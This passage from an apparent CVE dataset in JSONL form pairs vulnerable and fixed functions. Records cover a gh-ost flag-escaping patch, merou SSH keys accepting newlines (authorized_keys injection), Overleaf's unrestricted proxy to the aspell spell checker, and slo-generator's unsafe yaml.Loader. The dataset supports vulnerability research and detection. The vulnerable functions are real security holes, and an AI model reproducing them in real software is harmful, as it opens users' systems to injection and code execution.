exists, migration will postpone the final stage of swapping tables, and will keep on syncing the ghost table. Cut-over/swapping would be ready to perform the moment the file is deleted.\")\n\tflag.StringVar(&migrationContext.PanicFlagFile, \"panic-flag-file\", \"\", \"when this file is created, gh-ost will immediately terminate, without cleanup\")\n\n\tflag.BoolVar(&migrationContext.DropServeSocket, \"initially-drop-socket-file\", false, \"Should gh-ost forcibly delete an existing socket file. 
Be careful: this might drop the socket file of a running migration!\")\n\tflag.StringVar(&migrationContext.ServeSocketFile, \"serve-socket-file\", \"\", \"Unix socket file to serve on. Default: auto-determined and advertised upon startup\")\n\tflag.Int64Var(&migrationContext.ServeTCPPort, \"serve-tcp-port\", 0, \"TCP port to serve on. Default: disabled\")\n\n\tflag.StringVar(&migrationContext.HooksPath, \"hooks-path\", \"\", \"directory where hook files are found (default: empty, ie. hooks disabled). Hook files found on this path, and conforming to hook naming conventions will be executed\")\n\tflag.StringVar(&migrationContext.HooksHintMessage, \"hooks-hint\", \"\", \"arbitrary message to be injected to hooks via GH_OST_HOOKS_HINT, for your convenience\")\n\tflag.StringVar(&migrationContext.HooksHintOwner, \"hooks-hint-owner\", \"\", \"arbitrary name of owner to be injected to hooks via GH_OST_HOOKS_HINT_OWNER, for your convenience\")\n\tflag.StringVar(&migrationContext.HooksHintToken, \"hooks-hint-token\", \"\", \"arbitrary token to be injected to hooks via GH_OST_HOOKS_HINT_TOKEN, for your convenience\")\n\n\tflag.UintVar(&migrationContext.ReplicaServerId, \"replica-server-id\", 99999, \"server id used by gh-ost process. Default: 99999\")\n\n\tmaxLoad := flag.String(\"max-load\", \"\", \"Comma delimited status-name=threshold. e.g: 'Threads_running=100,Threads_connected=500'. When status exceeds threshold, app throttles writes\")\n\tcriticalLoad := flag.String(\"critical-load\", \"\", \"Comma delimited status-name=threshold, same format as --max-load. When status exceeds threshold, app panics and quits\")\n\tflag.Int64Var(&migrationContext.CriticalLoadIntervalMilliseconds, \"critical-load-interval-millis\", 0, \"When 0, migration immediately bails out upon meeting critical-load. When non-zero, a second check is done after given interval, and migration only bails out if 2nd check still meets critical load\")\n\tflag.Int64Var(&migrationContext.CriticalLoadHibernateSeconds, \"critical-load-hibernate-seconds\", 0, \"When non-zero, critical-load does not panic and bail out; instead, gh-ost goes into hibernation for the specified duration. It will not read/write anything from/to any server\")\n\tquiet := flag.Bool(\"quiet\", false, \"quiet\")\n\tverbose := flag.Bool(\"verbose\", false, \"verbose\")\n\tdebug := flag.Bool(\"debug\", false, \"debug mode (very verbose)\")\n\tstack := flag.Bool(\"stack\", false, \"add stack trace upon error\")\n\thelp := flag.Bool(\"help\", false, \"Display usage\")\n\tversion := flag.Bool(\"version\", false, \"Print version & exit\")\n\tcheckFlag := flag.Bool(\"check-flag\", false, \"Check if another flag exists/supported. This allows for cross-version scripting. Exits with 0 when all additional provided flags exist, nonzero otherwise. You must provide (dummy) values for flags that require a value. 
Example: gh-ost --check-flag --cut-over-lock-timeout-seconds --nice-ratio 0\")\n\tflag.StringVar(&migrationContext.ForceTmpTableName, \"force-table-names\", \"\", \"table name prefix to be used on the temporary tables\")\n\tflag.CommandLine.SetOutput(os.Stdout)\n\n\tflag.Parse()\n\n\tif *checkFlag {\n\t\treturn\n\t}\n\tif *help {\n\t\tfmt.Fprintf(os.Stdout, \"Usage of gh-ost:\\n\")\n\t\tflag.PrintDefaults()\n\t\treturn\n\t}\n\tif *version {\n\t\tappVersion := AppVersion\n\t\tif appVersion == \"\" {\n\t\t\tappVersion = \"unversioned\"\n\t\t}\n\t\tfmt.Println(appVersion)\n\t\treturn\n\t}\n\n\tmigrationContext.Log.SetLevel(log.ERROR)\n\tif *verbose {\n\t\tmigrationContext.Log.SetLevel(log.INFO)\n\t}\n\tif *debug {\n\t\tmigrationContext.Log.SetLevel(log.DEBUG)\n\t}\n\tif *stack {\n\t\tmigrationContext.Log.SetPrintStackTrace(*stack)\n\t}\n\tif *quiet {\n\t\t// Override!!\n\t\tmigrationContext.Log.SetLevel(log.ERROR)\n\t}\n\n\tif migrationContext.AlterStatement == \"\" {\n\t\tlog.Fatalf(\"--alter must be provided and statement must not be empty\")\n\t}\n\tparser := sql.NewParserFromAlterStatement(migrationContext.AlterStatement)\n\tmigrationContext.AlterStatementOptions = parser.GetAlterStatementOptions()\n\n\tif migrationContext.DatabaseName == \"\" {\n\t\tif parser.HasExplicitSchema() {\n\t\t\tmigrationContext.DatabaseName = parser.GetExplicitSchema()\n\t\t} else {\n\t\t\tlog.Fatalf(\"--database must be provided and database name must not be empty, or --alter must specify database name\")\n\t\t}\n\t}\n\n\tif err := flag.Set(\"database\", url.QueryEscape(migrationContext.DatabaseName)); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\n\tif migrationContext.OriginalTableName == \"\" {\n\t\tif parser.HasExplicitTable() {\n\t\t\tmigrationContext.OriginalTableName = parser.GetExplicitTable()\n\t\t} else {\n\t\t\tlog.Fatalf(\"--table must be provided and table name must not be empty, or --alter must specify table name\")\n\t\t}\n\t}\n\tmigrationContext.Noop = !(*executeFlag)\n\tif migrationContext.AllowedRunningOnMaster && migrationContext.TestOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--allow-on-master and --test-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.AllowedRunningOnMaster && migrationContext.MigrateOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--allow-on-master and --migrate-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.MigrateOnReplica && migrationContext.TestOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--migrate-on-replica and --test-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.SwitchToRowBinlogFormat && migrationContext.AssumeRBR {\n\t\tmigrationContext.Log.Fatalf(\"--switch-to-rbr and --assume-rbr are mutually exclusive\")\n\t}\n\tif migrationContext.TestOnReplicaSkipReplicaStop {\n\t\tif !migrationContext.TestOnReplica {\n\t\t\tmigrationContext.Log.Fatalf(\"--test-on-replica-skip-replica-stop requires --test-on-replica to be enabled\")\n\t\t}\n\t\tmigrationContext.Log.Warning(\"--test-on-replica-skip-replica-stop enabled. We will not stop replication before cut-over. 
Ensure you have a plugin that does this.\")\n\t}\n\tif migrationContext.CliMasterUser != \"\" && migrationContext.AssumeMasterHostname == \"\" {\n\t\tmigrationContext.Log.Fatalf(\"--master-user requires --assume-master-host\")\n\t}\n\tif migrationContext.CliMasterPassword != \"\" && migrationContext.AssumeMasterHostname == \"\" {\n\t\tmigrationContext.Log.Fatalf(\"--master-password requires --assume-master-host\")\n\t}\n\tif migrationContext.TLSCACertificate != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-ca requires --ssl\")\n\t}\n\tif migrationContext.TLSCertificate != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-cert requires --ssl\")\n\t}\n\tif migrationContext.TLSKey != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-key requires --ssl\")\n\t}\n\tif migrationContext.TLSAllowInsecure && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-allow-insecure requires --ssl\")\n\t}\n\tif *replicationLagQuery != \"\" {\n\t\tmigrationContext.Log.Warningf(\"--replication-lag-query is deprecated\")\n\t}\n\n\tswitch *cutOver {\n\tcase \"atomic\", \"default\", \"\":\n\t\tmigrationContext.CutOverType = base.CutOverAtomic\n\tcase \"two-step\":\n\t\tmigrationContext.CutOverType = base.CutOverTwoStep\n\tdefault:\n\t\tmigrationContext.Log.Fatalf(\"Unknown cut-over: %s\", *cutOver)\n\t}\n\tif err := migrationContext.ReadConfigFile(); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadThrottleControlReplicaKeys(*throttleControlReplicas); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadMaxLoad(*maxLoad); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadCriticalLoad(*criticalLoad); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif migrationContext.ServeSocketFile == \"\" {\n\t\tmigrationContext.ServeSocketFile = fmt.Sprintf(\"/tmp/gh-ost.%s.%s.sock\", migrationContext.DatabaseName, migrationContext.OriginalTableName)\n\t}\n\tif *askPass {\n\t\tfmt.Println(\"Password:\")\n\t\tbytePassword, err := terminal.ReadPassword(int(syscall.Stdin))\n\t\tif err != nil {\n\t\t\tmigrationContext.Log.Fatale(err)\n\t\t}\n\t\tmigrationContext.CliPassword = string(bytePassword)\n\t}\n\tmigrationContext.SetHeartbeatIntervalMilliseconds(*heartbeatIntervalMillis)\n\tmigrationContext.SetNiceRatio(*niceRatio)\n\tmigrationContext.SetChunkSize(*chunkSize)\n\tmigrationContext.SetDMLBatchSize(*dmlBatchSize)\n\tmigrationContext.SetMaxLagMillisecondsThrottleThreshold(*maxLagMillis)\n\tmigrationContext.SetThrottleQuery(*throttleQuery)\n\tmigrationContext.SetThrottleHTTP(*throttleHTTP)\n\tmigrationContext.SetIgnoreHTTPErrors(*ignoreHTTPErrors)\n\tmigrationContext.SetDefaultNumRetries(*defaultRetries)\n\tmigrationContext.ApplyCredentials()\n\tif err := migrationContext.SetupTLS(); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.SetCutOverLockTimeoutSeconds(*cutOverLockTimeoutSeconds); err != nil {\n\t\tmigrationContext.Log.Errore(err)\n\t}\n\tif err := migrationContext.SetExponentialBackoffMaxInterval(*exponentialBackoffMaxInterval); err != nil {\n\t\tmigrationContext.Log.Errore(err)\n\t}\n\n\tlog.Infof(\"starting gh-ost %+v\", AppVersion)\n\tacceptSignals(migrationContext)\n\n\tmigrator := logic.NewMigrator(migrationContext)\n\terr := migrator.Migrate()\n\tif err != nil 
{\n\t\tmigrator.ExecOnFailureHook()\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tfmt.Fprintf(os.Stdout, \"# Done\\n\")\n}"}], "vul_patch": "--- a/go/cmd/gh-ost/main.go\n+++ b/go/cmd/gh-ost/main.go\n@@ -142,6 +142,11 @@\n \t\t\tlog.Fatalf(\"--database must be provided and database name must not be empty, or --alter must specify database name\")\n \t\t}\n \t}\n+\n+\tif err := flag.Set(\"database\", url.QueryEscape(migrationContext.DatabaseName)); err != nil {\n+\t\tmigrationContext.Log.Fatale(err)\n+\t}\n+\n \tif migrationContext.OriginalTableName == \"\" {\n \t\tif parser.HasExplicitTable() {\n \t\t\tmigrationContext.OriginalTableName = parser.GetExplicitTable()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-4768", "cve_description": "A vulnerability was found in Dropbox merou. It has been classified as critical. Affected is the function add_public_key of the file grouper/public_key.py of the component SSH Public Key Handler. The manipulation of the argument public_key_str leads to injection. It is possible to launch the attack remotely. The name of the patch is d93087973afa26bc0a2d0a5eb5c0fde748bdd107. It is recommended to apply a patch to fix this issue. VDB-216906 is the identifier assigned to this vulnerability.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/dropbox/merou", "patch_url": ["https://github.com/dropbox/merou/commit/d93087973afa26bc0a2d0a5eb5c0fde748bdd107"], "programing_language": "Python", "vul_func": [{"id": "vul_py_156_1", "commit": "30755ea", "file_path": "grouper/public_key.py", "start_line": 52, "end_line": 99, "snippet": "def add_public_key(session, user, public_key_str):\n \"\"\"Add a public key for a particular user.\n\n Args:\n session: db session\n user: User model of user in question\n public_key_str: public key to add\n\n Throws:\n DuplicateKey if key is already in use\n PublicKeyParseError if key can't be parsed\n BadPublicKey if a plugin rejects the key\n\n Returns:\n PublicKey model object representing the key\n \"\"\"\n pubkey = sshpubkeys.SSHKey(public_key_str, strict=True)\n\n try:\n pubkey.parse()\n except sshpubkeys.InvalidKeyException as e:\n raise PublicKeyParseError(str(e))\n\n try:\n get_plugin_proxy().will_add_public_key(pubkey)\n except PluginRejectedPublicKey as e:\n raise BadPublicKey(str(e))\n\n db_pubkey = PublicKey(\n user=user,\n public_key=pubkey.keydata.strip(),\n fingerprint=pubkey.hash_md5().replace(\"MD5:\", \"\"),\n fingerprint_sha256=pubkey.hash_sha256().replace(\"SHA256:\", \"\"),\n key_size=pubkey.bits,\n key_type=pubkey.key_type,\n comment=pubkey.comment,\n )\n\n try:\n db_pubkey.add(session)\n Counter.incr(session, \"updates\")\n except IntegrityError:\n session.rollback()\n raise DuplicateKey()\n\n session.commit()\n\n return db_pubkey"}], "fix_func": [{"id": "fix_py_156_1", "commit": "d930879", "file_path": "grouper/public_key.py", "start_line": 52, "end_line": 106, "snippet": "def add_public_key(session, user, public_key_str):\n \"\"\"Add a public key for a particular user.\n\n Args:\n session: db session\n user: User model of user in question\n public_key_str: public key to 
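The gh-ost patch shown just above fixes an injection in the `--database` flag by passing the value through Go's `url.QueryEscape` before it is used to build anything URL-shaped. A minimal Python sketch of the same idea; `build_dsn` and the DSN layout are illustrative assumptions, not gh-ost code (which is Go):

```python
from urllib.parse import quote

def build_dsn(host: str, port: int, database: str) -> str:
    # Hypothetical helper: percent-encode the caller-supplied schema name so
    # metacharacters such as '?', '#' or '/' cannot splice extra options into
    # the DSN -- the same idea as the url.QueryEscape call in the patch above.
    return f"mysql://{host}:{port}/{quote(database, safe='')}"

# A hostile name can no longer smuggle a driver parameter:
print(build_dsn("127.0.0.1", 3306, "test?allowAllFiles=true"))
# -> mysql://127.0.0.1:3306/test%3FallowAllFiles%3Dtrue
```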
add\n\n Throws:\n DuplicateKey if key is already in use\n PublicKeyParseError if key can't be parsed\n BadPublicKey if a plugin rejects the key\n\n Returns:\n PublicKey model object representing the key\n \"\"\"\n pubkey = sshpubkeys.SSHKey(public_key_str, strict=True)\n\n try:\n pubkey.parse()\n except sshpubkeys.InvalidKeyException as e:\n raise PublicKeyParseError(str(e))\n\n # Allowing newlines can lead to injection attacks depending on how the key is\n # consumed, such as if it's dumped in an authorized_keys file with a `command`\n # restriction.\n # Note parsing the key is insufficient to block this.\n if \"\\r\" in public_key_str or \"\\n\" in public_key_str:\n raise PublicKeyParseError(\"Public key cannot have newlines\")\n\n try:\n get_plugin_proxy().will_add_public_key(pubkey)\n except PluginRejectedPublicKey as e:\n raise BadPublicKey(str(e))\n\n db_pubkey = PublicKey(\n user=user,\n public_key=pubkey.keydata.strip(),\n fingerprint=pubkey.hash_md5().replace(\"MD5:\", \"\"),\n fingerprint_sha256=pubkey.hash_sha256().replace(\"SHA256:\", \"\"),\n key_size=pubkey.bits,\n key_type=pubkey.key_type,\n comment=pubkey.comment,\n )\n\n try:\n db_pubkey.add(session)\n Counter.incr(session, \"updates\")\n except IntegrityError:\n session.rollback()\n raise DuplicateKey()\n\n session.commit()\n\n return db_pubkey"}], "vul_patch": "--- a/grouper/public_key.py\n+++ b/grouper/public_key.py\n@@ -20,6 +20,13 @@\n pubkey.parse()\n except sshpubkeys.InvalidKeyException as e:\n raise PublicKeyParseError(str(e))\n+\n+ # Allowing newlines can lead to injection attacks depending on how the key is\n+ # consumed, such as if it's dumped in an authorized_keys file with a `command`\n+ # restriction.\n+ # Note parsing the key is insufficient to block this.\n+ if \"\\r\" in public_key_str or \"\\n\" in public_key_str:\n+ raise PublicKeyParseError(\"Public key cannot have newlines\")\n \n try:\n get_plugin_proxy().will_add_public_key(pubkey)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-45312", "cve_description": "Overleaf is a web-based collaborative LaTeX editor. Overleaf Community Edition and Server Pro prior to version 5.0.7 (or 4.2.7 for the 4.x series) contain a vulnerability that allows an arbitrary language parameter in client spelling requests to be passed to the `aspell` executable running on the server. This causes `aspell` to attempt to load a dictionary file with an arbitrary filename. File access is limited to the scope of the overleaf server. The problem is patched in versions 5.0.7 and 4.2.7. Previous versions can be upgraded using the Overleaf toolkit `bin/upgrade` command. Users unable to upgrade may block POST requests to `/spelling/check` via a Web Application Firewall will prevent access to the vulnerable spell check feature. 
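The merou fix above (CVE-2022-4768) is a two-line guard: reject any key material containing CR or LF before it is stored, because `sshpubkeys` validates only the first line, and a second line would become a fresh, unrestricted `authorized_keys` entry. A standalone sketch of that guard (the function name is assumed for illustration):

```python
def validate_public_key(public_key_str: str) -> str:
    # Parsing alone is insufficient: a payload such as
    # "ssh-ed25519 AAAA... user\nssh-rsa BBBB... attacker"
    # parses fine (only line 1 is checked) yet writes a second entry,
    # without any command= restriction, when dumped to authorized_keys.
    if "\r" in public_key_str or "\n" in public_key_str:
        raise ValueError("Public key cannot have newlines")
    return public_key_str
```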
However, upgrading is advised.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/overleaf/overleaf", "patch_url": ["https://github.com/overleaf/overleaf/commit/b5e5d39c3ad4e7763d42b837738955f8ded4dcd3"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_138_1", "commit": "2dae278", "file_path": "services/web/app/src/Features/Spelling/SpellingController.js", "start_line": 31, "end_line": 62, "snippet": " proxyRequestToSpellingApi(req, res) {\n const { language } = req.body\n\n let url = req.url.slice('/spelling'.length)\n\n if (url === '/check') {\n if (!language) {\n logger.error(\n {},\n '\"language\" field should be included for spell checking'\n )\n return res.status(422).json({ misspellings: [] })\n }\n\n if (!languageCodeIsSupported(language)) {\n // this log statement can be changed to 'error' once projects with\n // unsupported languages are removed from the DB\n logger.debug({ language }, 'language not supported')\n return res.status(422).json({ misspellings: [] })\n }\n }\n\n const userId = SessionManager.getLoggedInUserId(req.session)\n url = `/user/${userId}${url}`\n req.headers.Host = Settings.apis.spelling.host\n return request({\n url: Settings.apis.spelling.url + url,\n method: req.method,\n headers: req.headers,\n json: req.body,\n timeout: TEN_SECONDS,\n })"}, {"id": "vul_js_138_2", "commit": "2dae278", "file_path": "services/web/app/src/router.js", "start_line": 1083, "end_line": 1087, "snippet": " webRouter.post(\n '/spelling/check',\n AuthenticationController.requireLogin(),\n SpellingController.proxyRequestToSpellingApi\n )"}], "fix_func": [{"id": "fix_js_138_1", "commit": "b5e5d39", "file_path": "services/web/app/src/Features/Spelling/SpellingController.js", "start_line": 31, "end_line": 55, "snippet": " proxyCheckRequestToSpellingApi(req, res) {\n const { language } = req.body\n\n if (!language) {\n logger.error({}, '\"language\" field should be included for spell checking')\n return res.status(422).json({ misspellings: [] })\n }\n\n if (!languageCodeIsSupported(language)) {\n // this log statement can be changed to 'error' once projects with\n // unsupported languages are removed from the DB\n logger.debug({ language }, 'language not supported')\n return res.status(422).json({ misspellings: [] })\n }\n\n const userId = SessionManager.getLoggedInUserId(req.session)\n const url = `${Settings.apis.spelling.url}/user/${userId}/check`\n req.headers.Host = Settings.apis.spelling.host\n return request({\n url,\n method: 'POST',\n headers: req.headers,\n json: req.body,\n timeout: TEN_SECONDS,\n })"}, {"id": "fix_js_138_2", "commit": "b5e5d39", "file_path": "services/web/app/src/router.js", "start_line": 1083, "end_line": 1087, "snippet": " webRouter.post(\n '/spelling/check',\n AuthenticationController.requireLogin(),\n SpellingController.proxyCheckRequestToSpellingApi\n )"}], "vul_patch": "--- a/services/web/app/src/Features/Spelling/SpellingController.js\n+++ b/services/web/app/src/Features/Spelling/SpellingController.js\n@@ -1,31 +1,24 @@\n- proxyRequestToSpellingApi(req, res) {\n+ proxyCheckRequestToSpellingApi(req, res) {\n 
const { language } = req.body\n \n- let url = req.url.slice('/spelling'.length)\n+ if (!language) {\n+ logger.error({}, '\"language\" field should be included for spell checking')\n+ return res.status(422).json({ misspellings: [] })\n+ }\n \n- if (url === '/check') {\n- if (!language) {\n- logger.error(\n- {},\n- '\"language\" field should be included for spell checking'\n- )\n- return res.status(422).json({ misspellings: [] })\n- }\n-\n- if (!languageCodeIsSupported(language)) {\n- // this log statement can be changed to 'error' once projects with\n- // unsupported languages are removed from the DB\n- logger.debug({ language }, 'language not supported')\n- return res.status(422).json({ misspellings: [] })\n- }\n+ if (!languageCodeIsSupported(language)) {\n+ // this log statement can be changed to 'error' once projects with\n+ // unsupported languages are removed from the DB\n+ logger.debug({ language }, 'language not supported')\n+ return res.status(422).json({ misspellings: [] })\n }\n \n const userId = SessionManager.getLoggedInUserId(req.session)\n- url = `/user/${userId}${url}`\n+ const url = `${Settings.apis.spelling.url}/user/${userId}/check`\n req.headers.Host = Settings.apis.spelling.host\n return request({\n- url: Settings.apis.spelling.url + url,\n- method: req.method,\n+ url,\n+ method: 'POST',\n headers: req.headers,\n json: req.body,\n timeout: TEN_SECONDS,\n\n--- a/services/web/app/src/router.js\n+++ b/services/web/app/src/router.js\n@@ -1,5 +1,5 @@\n webRouter.post(\n '/spelling/check',\n AuthenticationController.requireLogin(),\n- SpellingController.proxyRequestToSpellingApi\n+ SpellingController.proxyCheckRequestToSpellingApi\n )\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-22557", "cve_description": "SLO generator allows for loading of YAML files that if crafted in a specific format can allow for code execution within the context of the SLO Generator. 
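The Overleaf fix above (CVE-2024-45312) works by no longer forwarding `req.url` and `req.method` to the spelling backend: the proxied request is pinned to `POST /user/<id>/check`, the one path where the language allow-list always runs. A Python sketch of the pinned-URL idea; the names are illustrative, and the real fix is the JavaScript shown in the record:

```python
from urllib.parse import quote

def build_check_url(base_url: str, user_id: str) -> str:
    # Only the user id varies; the path suffix and (at the call site) the
    # HTTP method are constants, so a client can no longer steer the proxy
    # to a different backend endpoint with an attacker-chosen URL.
    return f"{base_url}/user/{quote(str(user_id), safe='')}/check"
```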
We recommend upgrading SLO Generator past https://github.com/google/slo-generator/pull/173", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/google/slo-generator", "patch_url": ["https://github.com/google/slo-generator/commit/36318beab1b85d14bb860e45bea186b184690d5d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_266_1", "commit": "50ce1bf", "file_path": "slo_generator/migrations/migrator.py", "start_line": 215, "end_line": 247, "snippet": "def exporters_v1tov2(exporters_paths, shared_config={}, quiet=False):\n \"\"\"Translate exporters to v2 and put into shared config.\n\n Args:\n exporters_path (list): List of exporters file paths.\n shared_config (dict): Shared config to add exporters to.\n quiet (bool): Quiet mode.\n\n Returns:\n list: List of exporters keys added to shared config.\n \"\"\"\n exp_keys = []\n for exp_path in exporters_paths:\n with open(exp_path, encoding='utf-8') as conf:\n content = yaml.load(conf, Loader=yaml.Loader)\n exporters = content\n\n # If exporters file has sections, concatenate all of them\n if isinstance(content, dict):\n exporters = []\n for _, value in content.items():\n exporters.extend(value)\n\n # If exporter not in general config, add it and add an alias for the\n # exporter. 
Refer to the alias in the SLO config file.\n for exporter in exporters:\n exporter = OrderedDict(exporter)\n exp_key = add_to_shared_config(exporter,\n shared_config,\n 'exporters',\n quiet=quiet)\n exp_keys.append(exp_key)\n return exp_keys"}, {"id": "vul_py_266_2", "commit": "50ce1bf", "file_path": "slo_generator/migrations/migrator.py", "start_line": 250, "end_line": 285, "snippet": "def ebp_v1tov2(ebp_paths, shared_config={}, quiet=False):\n \"\"\"Translate error budget policies to v2 and put into shared config\n\n Args:\n ebp_paths (list): List of error budget policies file paths.\n shared_config (dict): Shared config to add exporters to.\n quiet (bool): Quiet mode.\n\n Returns:\n list: List of error budget policies keys added to shared config.\n \"\"\"\n ebp_keys = []\n for ebp_path in ebp_paths:\n with open(ebp_path, encoding='utf-8') as conf:\n error_budget_policy = yaml.load(conf, Loader=yaml.Loader)\n for step in error_budget_policy:\n step['name'] = step.pop('error_budget_policy_step_name')\n step['burn_rate_threshold'] = step.pop(\n 'alerting_burn_rate_threshold')\n step['alert'] = step.pop('urgent_notification')\n step['message_alert'] = step.pop('overburned_consequence_message')\n step['message_ok'] = step.pop('achieved_consequence_message')\n step['window'] = step.pop('measurement_window_seconds')\n\n ebp = {'steps': error_budget_policy}\n if ebp_path.name == 'error_budget_policy.yaml':\n ebp_key = 'default'\n else:\n ebp_key = ebp_path.stem.replace('error_budget_policy_', '')\n ebp_key = add_to_shared_config(ebp,\n shared_config,\n 'error_budget_policies',\n ebp_key,\n quiet=quiet)\n ebp_keys.append(ebp_key)\n return ebp_keys"}], "fix_func": [{"id": "fix_py_266_1", "commit": "36318be", "file_path": "slo_generator/migrations/migrator.py", "start_line": 215, "end_line": 247, "snippet": "def exporters_v1tov2(exporters_paths, shared_config={}, quiet=False):\n \"\"\"Translate exporters to v2 and put into shared config.\n\n Args:\n exporters_path (list): List of exporters file paths.\n shared_config (dict): Shared config to add exporters to.\n quiet (bool): Quiet mode.\n\n Returns:\n list: List of exporters keys added to shared config.\n \"\"\"\n exp_keys = []\n for exp_path in exporters_paths:\n with open(exp_path, encoding='utf-8') as conf:\n content = yaml.load(conf, Loader=yaml.SafeLoader)\n exporters = content\n\n # If exporters file has sections, concatenate all of them\n if isinstance(content, dict):\n exporters = []\n for _, value in content.items():\n exporters.extend(value)\n\n # If exporter not in general config, add it and add an alias for the\n # exporter. 
Refer to the alias in the SLO config file.\n for exporter in exporters:\n exporter = OrderedDict(exporter)\n exp_key = add_to_shared_config(exporter,\n shared_config,\n 'exporters',\n quiet=quiet)\n exp_keys.append(exp_key)\n return exp_keys"}, {"id": "fix_py_266_2", "commit": "36318be", "file_path": "slo_generator/migrations/migrator.py", "start_line": 250, "end_line": 285, "snippet": "def ebp_v1tov2(ebp_paths, shared_config={}, quiet=False):\n \"\"\"Translate error budget policies to v2 and put into shared config\n\n Args:\n ebp_paths (list): List of error budget policies file paths.\n shared_config (dict): Shared config to add exporters to.\n quiet (bool): Quiet mode.\n\n Returns:\n list: List of error budget policies keys added to shared config.\n \"\"\"\n ebp_keys = []\n for ebp_path in ebp_paths:\n with open(ebp_path, encoding='utf-8') as conf:\n error_budget_policy = yaml.load(conf, Loader=yaml.SafeLoader)\n for step in error_budget_policy:\n step['name'] = step.pop('error_budget_policy_step_name')\n step['burn_rate_threshold'] = step.pop(\n 'alerting_burn_rate_threshold')\n step['alert'] = step.pop('urgent_notification')\n step['message_alert'] = step.pop('overburned_consequence_message')\n step['message_ok'] = step.pop('achieved_consequence_message')\n step['window'] = step.pop('measurement_window_seconds')\n\n ebp = {'steps': error_budget_policy}\n if ebp_path.name == 'error_budget_policy.yaml':\n ebp_key = 'default'\n else:\n ebp_key = ebp_path.stem.replace('error_budget_policy_', '')\n ebp_key = add_to_shared_config(ebp,\n shared_config,\n 'error_budget_policies',\n ebp_key,\n quiet=quiet)\n ebp_keys.append(ebp_key)\n return ebp_keys"}], "vul_patch": "--- a/slo_generator/migrations/migrator.py\n+++ b/slo_generator/migrations/migrator.py\n@@ -12,7 +12,7 @@\n exp_keys = []\n for exp_path in exporters_paths:\n with open(exp_path, encoding='utf-8') as conf:\n- content = yaml.load(conf, Loader=yaml.Loader)\n+ content = yaml.load(conf, Loader=yaml.SafeLoader)\n exporters = content\n \n # If exporters file has sections, concatenate all of them\n\n--- a/slo_generator/migrations/migrator.py\n+++ b/slo_generator/migrations/migrator.py\n@@ -12,7 +12,7 @@\n ebp_keys = []\n for ebp_path in ebp_paths:\n with open(ebp_path, encoding='utf-8') as conf:\n- error_budget_policy = yaml.load(conf, Loader=yaml.Loader)\n+ error_budget_policy = yaml.load(conf, Loader=yaml.SafeLoader)\n for step in error_budget_policy:\n step['name'] = step.pop('error_budget_policy_step_name')\n step['burn_rate_threshold'] = step.pop(\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23400", "cve_description": "The package nodemailer before 6.6.1 are vulnerable to HTTP Header Injection if unsanitized user input that may contain newlines and carriage returns is passed into an address object.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/nodemailer/nodemailer", "patch_url": ["https://github.com/nodemailer/nodemailer/commit/7e02648cc8cd863f5085bad3cd09087bccf84b9f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_137_1", "commit": "1750c0f", "file_path": 
